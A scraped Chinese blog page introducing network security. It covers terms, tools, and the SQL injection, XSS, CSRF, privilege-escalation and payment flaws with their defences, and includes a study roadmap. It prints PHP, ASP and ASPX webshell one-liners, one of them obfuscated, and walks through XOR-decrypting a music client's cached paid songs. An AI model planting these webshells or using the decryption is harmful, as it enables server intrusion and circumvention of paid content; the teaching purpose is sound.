精华内容
下载资源
问答
  • 最近开始学习网络安全相关知识,接触了好多新术语,感觉自己要学习的东西太多,真是学无止境,也发现了好几个默默无闻写着博客、做着开源的大神。准备好好学习下新知识,并分享些博客与博友们一起进步,加油。非常...

    最近开始学习网络安全相关知识,接触了好多新术语,感觉自己要学习的东西太多,真是学无止境,也发现了好几个默默无闻写着博客、做着开源的大神。准备好好学习下新知识,并分享些博客与博友们一起进步,加油。非常基础的文章,大神请飘过,谢谢各位看官!

    投票闲谈:
    最后希望大家帮我2019年CSDN博客之星投投票,每天可以投5票喔,谢谢大家!八年,在CSDN分享了410篇文章,15个专栏,400多万人次浏览,包括Python人工智能、数据挖掘、网络爬虫、图象处理、网络安全、JAVA网站、Android开发、LAMP/WAMP、C#网络编程、C++游戏、算法和数据结构、面试总结、人生感悟等。当然还有我和你的故事,感恩一路有你,感谢一路同行,希望通过编程分享帮助到更多人,也希望学成之后回贵州教更多学生。因为喜欢,所以分享,且看且珍惜,加油!等我四年学成归来~

    投票地址:http://m234140.nofollow.ax.mvote.cn/opage/ed8141a0-ed19-774b-6b0d-39c3aaf89dde.html?from=singlemessage

    在这里插入图片描述

    下载地址:https://github.com/eastmountyxz/NetworkSecuritySelf-study
    百度网盘:https://pan.baidu.com/s/1dsunH8EmOB_tlHYXXguOeA 提取码:izeb

    前文欣赏:
    [渗透&攻防] 一.从数据库原理学习网络攻防及防止SQL注入
    [渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法
    [渗透&攻防] 三.数据库之差异备份及Caidao利器
    [渗透&攻防] 四.详解MySQL数据库攻防及Fiddler神器分析数据包


    一.工具&术语

    1.网安术语

    常见安全网站及论坛:

    • 看雪(https://bbs.pediy.com/)
    • 安全客(https://www.anquanke.com)
    • freebuf(https://www.freebuf.com/)
    • 安全牛(https://www.aqniu.com/)
    • 安全内参(https://www.secrss.com/)
    • 绿盟(http://www.nsfocus.com.cn/)
    • 先知社区(https://xz.aliyun.com/)

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    基础知识:

    风险评估
    1)渗透测试技术:踩点扫描探测、信息收集、暴力解决、漏洞扫描、Web权限获取、Web提权、溢出攻击、植入后门、内网渗透等。
    2)安全漏洞的代码审计和代码加固技术:缓冲区溢出、拒绝服务、远程命令执行、注入、跨站、Web提权。

    安全防护
    1)中间件和Web应用的安全监测与防护方法:框架漏洞、权限绕过、弱口令、注入、跨站、文件包含、文件上传、命令执行、任意文件读取和下载等。
    2)主流厂商网络安全设备的调试与配置;主流数据库系统的补丁、账号管理、口令强度、有效期检查、远程服务、存储过程、审核层次、备份过程、用户功能和权限控制等基础技术;数据库库内库外加密、硬件加密、数据库审计技术;操作系统安全管理、客户端访问控制、入侵检测技术、数据异地灾备等技术。
    3)主机操作系统和应用软件的安全配置、主机运行的应用程序、正常运行所需端口,服务的正确配置,涉及系统安全风险测试、文件系统、关键数据、配置信息、口令用户权限等内容。

    应急响应
    1)应急响应相关技术:入侵取证分析、日志审计分析等。
    2)操作系统常规安全防护技术:利用系统日志、应用程序日志等溯源共计途径,系统账号、文件系统、网络参数、服务、日志审计等项目安全监测与安全加固方法。
    3)网络设备和安全设备的功能及使用方法:路由器、交换机、防火墙、入侵检测系统、拒绝服务供给系统、网页防篡改系统、漏洞扫描系统等。

    安全加固
    1)操作系统(Windows、Linux、Unix、Mac)的常规安全防护技术:利用系统日志、应用程序日志等溯源攻击途径,统账号、文件系统、网络参数、服务、日志审计等项目安全监测与安全加固方法。
    2)Webcms、中间件、数据库等常规用Web应用的加固知识,应用防火墙、IPS、IDS等安全设备进行辅助加固措施。

    大数据安全
    1)云计算和大数据技术带来的安全问题:虚拟机安全、应用程序安全、大数据安全。
    2)大数据分析技术提升网络系统安全隐患发现和防护能力。

    物联网安全
    1)ID/IC卡的安全漏洞检测和发现技术,智能卡常见加密算法。
    2)物联网应用环境中典型安全攻击:RFID攻击等。
    3)无线安全、硬件安全等知识。

    其他
    1)密码学概念、加密算法、加密分析工具。
    2)网络攻击原理及常见网络攻击协议,数据包分析工具。
    3)Web攻击种类及常见的Web利用方式,注入攻击类型及方式。
    4)漏洞产生原因、漏洞的利用与防护方式。
    5)恶意代码、逆向工程、沙箱保护。
    6)移动互联网恶意程序检测与处置机制,移动逆向分析与代码审计技术、移动安全防护。
    7)数据恢复常用技术及工具。
    8)工业控制系统、工控漏洞及加固分析、工控漏洞玩、工控安全仿真及蜜罐、工控系统上位机及应用安全等。

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    常见攻击手段:

    • 扫描
    • 爆破
    • 溢出
    • 木马病毒
    • Web攻击
    • 无线攻击
    • VPN劫持
    • Kali攻击
    • MAC泛洪攻击
    • 时钟攻击

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    常见术语:

    • 0day
    • 动态分析、静态分析
    • 逆向分析
    • PE文件
    • 注册回调
    • HOOK技术
    • 注入技术
    • 加壳、脱壳、加花
    • 社会工程学
    • 供应链渗透
    • SAM哈希暴力
    • 彩虹表
    • 数据取证
    • 可信计算

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    下面分享2019年看雪安全峰会的几张图,与君共勉。
    CSDN和看雪都已经20年了,这些年见证了无数技术更新,博友不断成长。


    2.常用工具

    Burpsuite

    Burpsuite是用于攻击web应用程序的集成平台,包含了许多工具。Burpsuite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。通常利用Burpsuite抓包分析,寻找Web漏洞。

    手机APP渗透两种思路:
    (1) 电脑浏览器打开链接,burpsuite抓包,修改user-Agent的内容。一般是判断user-Agent里有没有MicroMessenger(适合没有做重定向,或者重定向不加token验证)。
    (2) 做了重定向,加token验证。手机和电脑同在一个局域网下,设置电脑为手机代理,用burpsuite抓包。设置了电脑代理手机的情况下,电脑相当于一层网关,自然抓取的到。

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    Fiddler
    Fiddler是位于客户端和服务器端的HTTP代理,也是目前最常用的http抓包工具之一 。 它能够记录客户端和服务器之间的所有 HTTP请求,可以针对特定的HTTP请求,分析请求数据、设置断点、调试web应用、修改请求的数据,甚至可以修改服务器返回的数据,功能非常强大,是web调试的利器。

    Fiddler是用C#写出来的,它包含一个简单却功能强大的基于JScript .NET 事件脚本子系统,它的灵活性非常棒,可以支持众多的http调试任务,并且能够使用.net框架语言进行扩展。安装前需安装microsoft .net framework可执行文件。

    手机渗透:可以尝试抓取微信浏览器中的结构头,接着通过fiddler的方式,在用第三方(360、QQ、谷歌等)打开的时候,所有数据都会经过fiddler,将该结构修改即可。

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    SQLMAP
    SQLMAP是一款非常强大的开源渗透测试工具,用于自动检测和利用SQL注入漏洞控制数据库服务器的过程。它配备了一个强大的检测引擎,由Python语言开发完成,通过外部连接访问数据库底层文件系统和操作系统,并执行命令实现渗透。

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    OllyDbg
    OLLYDBG是一个新的动态追踪工具,将IDA与SoftICE结合起来的思想,Ring 3级调试器,非常容易上手,己代替SoftICE成为当今最为流行的调试解密工具了。同时还支持插件扩展功能,是目前最强大的调试工具。

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    IDA Pro
    交互式反汇编器专业版(Interactive Disassembler Professional),是目前最棒的一个静态反编译软件,为众多0day世界的成员和ShellCode安全分析人士不可缺少的利器。IDA Pro是一款交互式的,可编程的,可扩展的,多处理器的,交叉Windows或Linux WinCE MacOS平台主机来分析程序, 被公认为最好的花钱可以买到的逆向工程利器。IDA Pro已经成为事实上的分析敌意代码的标准并让其自身迅速成为攻击研究领域的重要工具。它支持数十种CPU指令集其中包括Intel x86,x64,MIPS,PowerPC,ARM,Z80,68000,c8051等等。

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    pangolin
    Pangolin(中文译名为穿山甲)一款帮助渗透测试人员进行Sql注入测试的安全工具,是深圳宇造诺赛科技有限公司(Nosec)旗下的网站安全测试产品之一。

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    Caidao
    Caidao软件据说是一个桂林退役士兵写的,真的很厉害。它是一款Webshell管理工具,支持各种语言,常见的包括ASP、ASPX、PHP、JSP、CFM等,后面希望自己也能深入研究攻防底层内容。目前,Caidao已经被中国蚁剑和冰蝎Behinder取代。

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    中国蚁剑
    中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。中国蚁剑采用了Electron作为外壳,ES6作为前端代码编写语言,搭配Babel&Webpack进行组件化构建编译,外加iconv-lite编码解码模块以及superagent数据发送处理模块还有nedb数据存储模块,组成了这个年轻而又充满活力的新一代利器。

    它包括的功能有端口扫描、Socks代理、反弹Shell、内网漏洞扫描、内网代理浏览器、内网漏洞溢出测试、后门扫描、密码爆破、打包下载、交互式终端、权限提升。
    GitHub上蚁剑搜AntSword:https://gitee.com/mirrors/antSword

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    冰蝎Behinder
    地址:https://github.com/rebeyond/Behinder

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++

    差异备份

    数据备份主要分位完全备份、增量备份和差异备份。其中差异备份是指备份自上一次完全备份之后有变化的数据,在差异备份过程中,只备份有标记的那些选中的文件和文件夹。它不清除标记,即备份后不标记为已备份文件,不清除存档属性。

    整体流程是先备份日志,然后插入一句话Muma;再次备份时,数据库只会备份两次间隔中的差异,使得生成出来的文件尽可能小,故称为“差异备份”。

    一句话木马是:

    <?php substr(md5($_REQUEST[*x*]),28)==*acd0*&&eval($_REQUEST[*abc*]);?>
    

    一句话木马插入到数据库表的a字段中,执行接收自定义Sh参数,类似于URL的Code参数,相当于是一个侧门,第二部分Caidao会使用到。

    asp:
       <%execute(request("value"))%>
    php:
       <?php @eval($_POST[value]);?>
    aspx:
       <%eval(Request.Item["value"])%>
    

    3.推荐文章

    看雪 渗透入门——HackInOS
    HackinOS是一个渗透靶机,模拟真实的渗透环境,方便我们练习渗透方法。

    CSDN鬼手56大神网络安全6个专栏文章
    开源一个自写的病毒技术工具:https://blog.csdn.net/qq_38474570/article/details/87707942

    CSDN谢公子大神安全专栏

    CSDN刘焕勇大神老师NLP、知识图谱系列文章
    自然语言处理界的小螺丝钉:https://blog.csdn.net/lhy2014/article/details/82954509
    Github:https://github.com/liuhuanyong

    博客园sch01ar大神逆向工程的文章
    实验吧CTF题库-WEB题(部分): https://www.cnblogs.com/sch01ar/p/7996159.html

    CSDN博友whatiwhere逆向工程文章
    IDA Pro使用初探:https://blog.csdn.net/whatiwhere/article/details/81610539
    逆向基础知识:https://blog.csdn.net/whatiwhere/article/details/80158293

    CSDN博友caiqiiqi大神的Android Q逆向文章
    逆向初体验之玩“英语趣配音”:https://blog.csdn.net/caiqiiqi/article/details/47832473

    黑客是怎样入侵你的网站的 - Flamingo大神
    http://www.freebuf.com/articles/web/7359.html

    看雪论坛Web普及文章
    勒索病毒WannaCry深度技术分析:https://bbs.pediy.com/thread-217662.htm
    Web基础设施知识及安全攻防:https://bbs.pediy.com/thread-199199.htm
    Discuz!ML V3.2代码执行漏洞复现:https://bbs.pediy.com/thread-252603.htm
    内网渗透小记:https://bbs.pediy.com/thread-192778.htm


    二.常见攻击

    感谢汤神的分享,推荐大家阅读下面两篇原文,这里主要是学习看雪论坛分享的知识,也作为自己网络安全的入门文章,如果读者觉得这部分不好或侵权,作者可以删除。

    浅析WEB安全编程:https://bbs.pediy.com/thread-222922.htm
    XSS跨站总结:https://bbs.pediy.com/thread-196518.htm

    代码注入、CSRF、0元支付、短信轰炸这些都是非常常见的漏洞,这里简单解释这些名词。

    1.SQL注入

    汤神从漏洞成因,攻击方式以及防御方案三个方面讲解SQL注入。漏洞成因我们可以用这两句话,使用用户参数拼接这个SQL语句,这个参数改变了原有的SQL结构,改变了这个SQL的注入。
    下图左边这是一个数据库,白色部分的字体是我们在代码中写到的SQL结构,黑色部分就是攻击者可能会传入的参数(‘1’='1’始终成)。当我们把这个SQL结构拼接出来之后形成了一个新的结构,这个结构被执行之后把整张表所有的数据传输出来,数据库比较大的访问更多请求,整个可能就挂了,还造成一些数据泄漏的情况,这些就是SQL的注入成因,参数改变了原有的SQL结构。

    攻击者通常有哪几种攻击方式?
    汤神把它分为了三种类型:一种是回显注入,一种是报错注入,一种是盲注。

    回显注入
    利用注入漏洞可以改变页面返回数据,则称之为回显注入。
    第一张图是传入ID是正常的正型数字,返回的结果是用户的一个信息传入ID等于1,上面URL把这个参数修改了一下,等于1,然后加了 or 1=‘1,当它拼接到之后,跟前面一样把整个表的数据传输出来,这边看到整个用户表的数据都被列举出来了。利用漏洞可以改变这个页面的数据我们叫做回显注入,这个黑客可以直接把这个数据下载下来。

    报错注入
    下图非常清楚看到,URL上面这个部分是正常URL加上攻击者所利用的攻击代码。其实这上面的攻击代码也是执行不了,但放到数据库中,最后会造成数据库返回异常码,并把异常码抛出来,接着这个用户名(act_admin 10.59.107.125)就被展示出来了。这是非常敏感的信息,我们写代码的时候需要把数据库抛出来的错误屏蔽,不让其在前台显示出来,通过报错显示了一些敏感信息,我们称之为报错注入。

    盲注
    盲注和回显注入以及报错注入不一样,我们没有办法通过页面数据看到它的区别。可以通过两种方式实现盲注——布尔盲注和时间盲注。下图中绿色部分是正常URL,红色部分是布尔注入的表示式,前面加一个and截取一个字符,判断一下id的第一个字符是不是大于字母a。
    如果成立则整个条件都成立,这个时候页面是有反馈数据的;如果不成立这个页面就不返回数据,这就是布尔数据。我们可以看到有数据和没有数据的情况,当字母a不断变换的时候,也可以把这个数据库里面的数据猜测出来。

    时间盲注是下面蓝色区域部分,我们知道数据库里面可以用一些IF函数,也是截取第一个字符,如果这个不成立就到五秒钟返回,通过这个页面返回的时间可以判断这个地方是不是有注入的,也可以把这个数据都给下载下来。

    刚刚说到攻击者碰到的三种攻击方式,下面看一下怎么样检测页面当中有没有注入点?我们通过SQLMAP实现,可以看到这是一个CMD窗口,上面是写到的检测表达式,Splmap.py以及需要检测的UI,需要有这个注册点它会告诉你有哪些注入,比如说这个页面是在本地测试的结果,它就告诉了有回显注入、错误注入以及一些盲注。

    SQLMAP用法推荐秀璋的另一篇文章:[渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法

    呢么,怎么样防范服务器的安全呢?

    第一种方法是拦截带有SQL语法的参数的传入。参数会改变SQL的结构,当我们知道这个参数是整型的时候,就把这个参数转型为整型,整型肯定不包括这个SQL结构,无法改变结构,哪就不存在SQL注入。

    第二种方法是通过预编译处理拼接参数的SQL语句。有的时候我们无法预测它传什么参数,比如我们去论坛回复一个帖子,肯定没有办法控制,这个时候我们可以用PDO预处理,这是最常见的方法,也是一个最好的方法。但有时我们会写一些复杂社会语句,会用第一种方法,我们先定义好这个SQL语句结构,再把参数放进去,这个时候是无法达到更改SQL语句处理的目的。

    第三个方法是定期分析数据库执行日志,判断是否有异常SQL执行。当业务比较大的时候,日志是非常多的,可以找一些SQL的取模软件进行取模,取模之后并不太多,如果直接看的话是海量日志,是没法看的。


    2.XSS跨站

    跨网站脚本(Cross-site scripting,通常简称为XSS或跨站脚本或跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。

    XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、VBScript、ActiveX、 Flash或者甚至是普通的HTML。攻击成功后,攻击者可能得到更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。

    主要从漏洞成因、攻击场景和防御方法三方面讲解。

    如上图所示,上面有一个URL,下面是一个页面返回的HTML代码,我们可以看到白色部分HTML是我们事先定义好,黑色部分参数是用户想搜索的关键词。当我们搜索了test+Div最后等于123,对后反馈页面一般搜索会告诉你用户搜索了什么关键词,结果如何等等。

    这个地方如果没有做好转移,可能会造成XSS跨站,我们可以看到蓝色部分是我们事先定义好的结构,被攻击者利用之后它先把这个DIV结束了,最后加上一个script标签,它也有可能不跟你谈标签,直接发送到它的服务器上。参数未经过安全过滤,然后恶意角本被放到网页当中执行,用户浏览的时候执行了这个脚本。

    漏洞原因即为:

    XSS分为三种类型——反射型、存储型以及DOM型。

    反射型
    下图是专门训练一些WEB漏洞的练习页面,我们可以输入自己的名字,输入之后会把我们的名字显示出来。例如我们输入了一个“张三”,这个时候弹出来了一个“123”,在那边显示了一个张三,但是script标签没有出来,因为这个标签被执行了。

    存储型
    在存储型XSS中,可以看到这个URL上面并没有代码,但是依然弹出了一个“1”。它是发现个人资料页的时候有一个XSS漏洞,在个性签名的位置填入了一个XSS标签,弹出了一个“1”,把这个地址发给别人,别人看到这个地址并没有什么代码以为这个页面是安全的,结果一打开就插入了这个XSS代码。

    存储型XSS的攻击危害比较大,因为它的页面当中是看不到这个Script的代码,别人防不胜防。只要管理员没有发现,下一个用户或者下一个用户一直接发它,而反射型需要用户主动点击的。

    DOM型
    Dom型的XSS是一些有安全意识的开发者弄出来的。比如说接受参数会做一些过滤,把一些字符转义一下,但是转义之后依然会存在着XSS的情况,比如说下图中,我们上面输入的可以看到这行代码规律,把这个大括号、小括号以及双页号进行转移,按理说转移之后它应该不会再作为它的标签存在,不会存在XSS的代码。

    下面Script通过ID获得的这个值,复制到了这个DIV上,经过DOM操作之后,之前转义的字符就变为它的标签,所以经过DOM操作的XSS我们称之为DOMXSS。它有可能通过URL传播,也有可能通过服务器的传播。

    最后给出一些编码的防范措施。

    第一是标签黑白名单过滤。有时根本就不需要考虑到它是不是HTML标签,我们根本用不到HTML标签。

    第二是代码实体转义。只保留文字部分这是一劳永逸的,有时我们还是需要展示这个标签,比如说程序论坛当中要贴一个代码,这个时候我们需要用一些转义,它会把这个大括号、小括号以及双引号做一个转义,做为一个字符,就无法执行这个标签型,后面加一个参数,但有时候单引号也会造成XSS。

    第三是httponly防止cookie被盗取。一个信号当中有那么多的地方存在着这个输入以及检测的地方,可能就有一些地方漏掉,只要有一个地方漏掉了,用户的cookie信息就被盗取了。服务器在发送用户信息的时候,我们需要加上一个httponly,这个代码无法读取到cookie的信息,那么攻击者也是得不到这个信息的。对于用户来说也是非常好的保护。比如说张三在我们网站上登陆了一下用户名,李四他特意发了一个攻击请求,他拿不到这个用户ID,就冒充不了这个张三。

    如果在Cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到Cookie信息,这样能有效的防止XSS攻击


    3.越权漏洞

    我们再来看看越权漏洞,在一些系统当中如果存在着多种用户角色,每一种角色有不同的权限。操作业务适合如果权限不严格可能会发生越权漏洞。越权分为垂直越权和平行越权,其产生原因包括:
    1)业务系统存在用户权限验证
    2)对用于的权限验证不严谨
    3)用户能操作不属于自己权限的操作

    平行越权
    在WEB系统中有商城,这个商城中必不可少的就有订单,订单肯定有一个店铺ID,我们通常把它设置为一个自增长的ID,这个ID是一个数字类型。在URL上面如果有一个订单ID就是100,攻击者会尝试100+1,当它ID等于101或者99的时候能否访问到。

    如果能访问到并且这个订单信息不是我的,这个地方就存在着一个漏洞。张三可以看到李四的订单信息,这个时候就存在着越权。张三和李四是平级的用户,他们两个权限是一样,互相可以看到平台信息这叫做平行越权。

    这个有什么危害呢?
    比如说这个网站有漏洞,如果是竞争对手他就可以知道用户在我的平台上下过订单的行为,然后去营销。如果把这个订单ID直接暴露出来,还有一种可能就是竞争对手会根据我们的订单IP的增长量,判断我们的增长量,就知道我们一天到底有多少订单。

    平行越权防御方法:我们查询的时候必须加上当前用户的ID,就是orderID加上UID,这样不会出现张三可以看到李四的订单了。

    垂直越权
    接下来我们再看一下垂直越权,这是一个普通用户进入到后台管理系统中,他的权限就扩大化了。通常这种情况下,后台会集成到更多的控制器来统一管理,但依然有一些邮件会漏掉并没有集成到,就会发生这种情况。

    黑客不会一个一个找,会通过一些扫描器发现漏洞进去。建议不要把自增长ID暴露出来,可以做对称加密或者非对称加密,先转换为一个字母类型,让别人看不到你的数字型的ID是多少。别人就没有办法通过这个加一减一的方式越权,也看不到你的一天业务增长量。

    汤神建议尽量把前台的方法和后台的方法区分开来。越权,其实不仅仅限于展示,我们刚刚看到了这个订单,张三可以看到李四的订单信息是查看,但是有的时候我们修改订单的时候也会出现这个问题,所以在读写的时候都需要注意一下这个越权的问题。


    4.CSRF跨站请求伪造

    CSRF通常会配合XSS使用。服务端错把浏览器发起的请求当成用户发起的请求,会造成XSS问题。比如说我打开了张三的网站,登陆了一个用户信息,李四网站上有一个攻击代码,向张三这个网站发起请求,张三的网站会以为你本人发起的请求,实际上是浏览器发出的请求。
    产生原因为:
    1)服务端错把“浏览器发起的请求”当成“用户发起的请求”
    2)已登录的浏览器,打开恶意网址后,被执行了相应操作

    下图中有一个表单,左边是它的源码,我们可以看到表单每一项都在,但是从安全的角度上考虑它是少了一样东西,没有一些验证码或者TOKEN等等相关信息。服务端如果没有验证这个问题,就会造成这个CSRF的攻击。

    如何检测我们的系统当中是否存在这个CSRF?
    1)去掉token参数尝试能够正常请求
    2)去掉referer是否可以提交成功
    3)是否能用GET提交替代POST提交

    如果以上都存在,那么它就存在CSRF。建议一定要验证Reeferer信息、Token验证、图片验证码等。根据业务安全等级越高,最基础的可以用这个refefe验证,再高一级就是token,再高一级就是图片验证。


    5.支付漏洞

    最后看看支付漏洞。汤神之前看到一个新闻,有一个浙江老板,他想做线上找人做了一个网站,这个网站存在着一些支付漏洞,一周之后他发现这个订单量极速上升,卖了70多万,结果看了一下帐户余额只有几千块钱,报警之后才查到原因,但是货物已经发出去了。

    支付漏洞主要产生的原因包括:
    1)开发者在数据包中传递支付的金额
    2)后端没有对金额做校验或者签名
    3)导致攻击者可以随意篡改金额提交

    造成这些漏洞原因有很多,比如说支付金额是由前端提交的数据,不是后端计算的,而且没有对这个金额做校验,直接信任前端提交的金额,导致这个攻击者可以随即修改这个金额,比如修改为一分钱,这是非常典型的可以随意更改这个金额。
    上面的金额是94元,这个表单里面改为一分钱,最后提交的时候是一分钱,这是非常好的漏洞,也是非常典型的。

    修改数量:

    还有一个问题是数量的限制,一个价格是26元,一个是27元,把这个数量变为负一之后,一提交变为一块钱了。这是之前数据包的漏洞,他充值了一块钱,他发现有一个数据包向网站发送,他就把这个数据包反复重放,就加了好几次,实际上只充值了一块钱。

    如何防范?
    可以限制这个低价购买产品,比如说负数的时候肯定不行,等于零的商品根据业务情况也是需要多注意的。限制免费商品获得金钱和积分的情况,有一些商品免费,但是它可以获得一些积分,那就存在着刷积分的情况。

    最后给出了汤神此次分享的思维导图。

    PS:真心感激自己要学习的知识好多,也有好多大神卧虎藏龙,低调加油,一起进步~


    三.音乐异或解密示例

    接下来复现CSDN“鬼手56”大神的文章,他的网络安全、Crackme、病毒分析、软件逆向等系列文章真心推荐大家学习,包括他开源的项目,他的文章我都准备all in。

    顺便补充我俩的对话,一句“今天最开心的是就是看到你的这条评论”道出了多少程序员的纯真和可爱,分享知识和开源代码的路上,真需要你我的点赞。电脑前的你我,一路同行。

    参考原文:https://blog.csdn.net/qq_38474570/article/details/87878235


    我们打开PC端某音乐客户端,比如想下载周杰伦的“骑士精神”,通常需要提示付费。

    此时点开设置,选中“下载设置”,找到缓存文件目录。
    C:\Users\yxz\AppData\Local\Netease\CloudMusic\Cache\Cache

    双击播放该歌曲,然后按照寻找最新的文件或只保留一首歌,其中后缀名为“.uc”的最大文件就是加密过后的文件。

    接在将文件拖动到010 Editor软件,如下图所示:它是一个加密文件,最多的数据是A3,鬼手大神成果的预测其是加密后的无意义0,通常音频的加密方式不会太复杂,而最简单的异或加密(可逆)。

    接着点开菜单,Tools(工具),将其转换为“十六进制”,进行“二进制异或”操作,修改数据为无符号十六进制,并对A3进行异或即可。

    注意选择无符号(Unsigned Byte)和异或A3。

    异或加密解密:

    A3 ⊕ A3 = 00

    A 01100001  3  00000011
    A 01100001  3  00000011
    0 00000000  0  00000000
    

    文件解密如下所示,其中A3变换为00,解密完之后的字符变得有意义。前三个字节是ID3,这个是MP3文件格式的头部。

    最后将文件重命名为“.mp3”,此时可以听歌了,“骑士精神”走起。

    PS:这是一个简单的加密过程,推荐读者们下载正版歌曲,共同维护版权和绿色网络环境。同时,异或加密音乐已经很多年了,希望这些开发公司优化下加密算法,解决这个漏洞。这篇文章更希望分享加密的过程给读者。


    四.总结

    希望这篇基础性文章对你有所帮助,如果有错误或不足之处,还请海涵。后续将分享更多网络安全方面的文章了,从零开始很难,但秀璋会一路走下去的,加油。

    故人应在千里外,
    不寄梅花远信来。
    武汉第一周学习结束,寄了第一封家书给女神,接下来这几年,应该会写上200来封吧,很期待,也很漫长,但我俩的故事将继续书写。

    未来的路还很长,优秀的人真的太多,我们只有做好自己,不忘初心,享受生活,砥砺前行。明天周末继续奋斗,晚安娜,记得收信。

    (By:Eastmount 2019-07-31 周三晚上7点写于武大 https://blog.csdn.net/Eastmount )


    2020年8月18新开的“娜璋AI安全之家”,主要围绕Python大数据分析、网络空间安全、人工智能、Web渗透及攻防技术进行讲解,同时分享CCF、SCI、南核北核论文的算法实现。娜璋之家会更加系统,并重构作者的所有文章,从零讲解Python和安全,写了近十年文章,真心想把自己所学所感所做分享出来,还请各位多多指教,真诚邀请您的关注!谢谢。

    展开全文
  • 网络安全-自学笔记

    万次阅读 多人点赞 2020-06-16 17:29:55
    目录 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 ...网络安全-sqlmap学习笔记 通信安全 网络-http协议学习笔记(消息结构、请求方法、状态码等) ...

    目录

    相关网站推荐

    WEB(应用)安全

    学习路线

    推荐

    书籍

    网站

    在线靶场

    基础

    XSS攻击

    CSRF漏洞

    劫持攻击

    点击劫持

    SSRF漏洞

    文件包含漏洞

    文件上传漏洞

    XXE漏洞

    WebShell

    解析安全

    RCE漏洞

    SQL注入漏洞

    反序列化漏洞

    条件竞争

    通信安全

    应用层

    传输层

    网络层

    身份认证与访问控制

    弱口令爆破

    渗透测试

    学习路线

    基础知识

    推荐

    书籍

    练习靶场

    信息收集

    漏洞扫描

    渗透攻击

    现代密码学

    CTF

    项目推荐

    比赛推荐

    模糊测试

    AFL

    文件模糊测试

    插桩

    java插桩


    相关网站推荐

    博主研究方向为安全领域,以后可能更多的在圈子内发表文章,提高文章质量。

    1、FreeBuf

    国内关注度最高的全球互联网安全媒体平台,爱好者们交流与分享安全技术的社区,网络安全行业门户。

    个人账户:ladykiller9

    2、看雪

    看雪论坛是个软件安全技术交流场所,为安全技术爱好者提供一个技术交流平台和资源。

    个人主页:lady_killer9

    3、吾爱破解

    吾爱破解论坛是致力于软件安全与病毒分析的非营利性技术论坛。

    4、阿里云先知社区

    一个开放型技术平台。

    个人主页:ladykiller9

    5、腾讯玄武安全实验室

    各种CVE,漏洞。

    6、SecWiki

    安全维基,各种安全资讯。

    WEB(应用)安全

    学习路线

    WEB安全学习路线

    想法:分别学习各个模块,搭建靶机进行练习,做CTF中的WEB安全题,然后再看懂后台代码,为什么会有漏洞,接下来复现一些CVE制作成镜像给看雪等CTF比赛官方,最后学习metasploit等软件,以宏观的角度,从情报搜集开始到漏洞利用做整个渗透报告,最后将靶机的漏洞危险程度由low->impossible(感觉并没有那么多时间...慢慢来吧)。和我一起来学习WEB安全吧!!!

    推荐

    书籍

    入门

    • 《白帽子讲Web安全》 2012
    • 《Web安全深度剖析》2015
    • 《Web安全攻防 渗透测试实战指南》2018

    进阶

    • 《WEB之困-现代WEB应用安全指南》 2013
    • 《内网安全攻防渗透测试安全指南》 2020
    • 《Metasploit渗透测试魔鬼训练营》2013
    • 《SQL注入攻击与防御》2010
    • 《黑客攻防技术宝典-Web实战篇(第2版)》

    网站

    Web安全学习笔记

    安全词汇 RFC-4949

    接下来开始学习,理论并非纯理论,也有靶机攻击举例,实战一般使用离线或线上靶机。

    在线靶场

    国钧CTF

    BUUCTF

    bugku

    网络信息安全攻防平台

    基础

    web安全必备:

    网络安全-php安全知识点

    网络安全-WEB中的常见编码

    跨域请求-jsonp和cors

    学xss注入时再看也可:

    网络安全-js安全知识点与XSS常用payloads

    学sql注入时再看也可:

    网络安全-Mysql注入知识点

    漏洞排行:

    OWASP TOP 10

    XSS攻击

    ----------------------------------理论----------------------------------

    网络安全-跨站脚本攻击(XSS)自学笔记

    网络安全-XSStrike中文手册(自学笔记)

    ---------------------------------实战-----------------------------------

    靶机:dvwa

    网络安全-靶机dvwa之XSS注入Low到High详解(含代码分析)

    靶机:pikachu

    网络安全-靶机pikachu之xss注入与代码分析(XSStrike实战)

    靶机:xssplatform

    CSRF漏洞

    ----------------------------------理论与实战----------------------------------

    网络安全-跨站请求伪造(CSRF)的原理、攻击及防御

    劫持攻击

    点击劫持

    ----------------------------------理论----------------------------------

    网络安全-点击劫持(ClickJacking)的原理、攻击及防御

    SSRF漏洞

    -----------------------------理论及实战--------------------------------

    网络安全-SSRF漏洞原理、攻击与防御

    文件包含漏洞

    -----------------------------理论及实战--------------------------------

    网络安全-文件包含漏洞原理、攻击及防御

    文件上传漏洞

    -----------------------------理论及实战--------------------------------

    网络安全-文件上传漏洞的原理、攻击与防御

    XXE漏洞

    -----------------------------理论及实战--------------------------------

    网络安全-XXE(XML外部实体注入)原理、攻击及防御

    WebShell

    解析安全

    RCE漏洞

    ----------------------------------理论----------------------------------

    网络安全-RCE(远程命令执行)漏洞原理、攻击与防御

    SQL注入漏洞

    ----------------------------------理论----------------------------------

    网络安全-SQL注入原理及防御SQL注入

    网络安全-sqlmap学习笔记

    网络安全-sqlmap注意项及高级使用

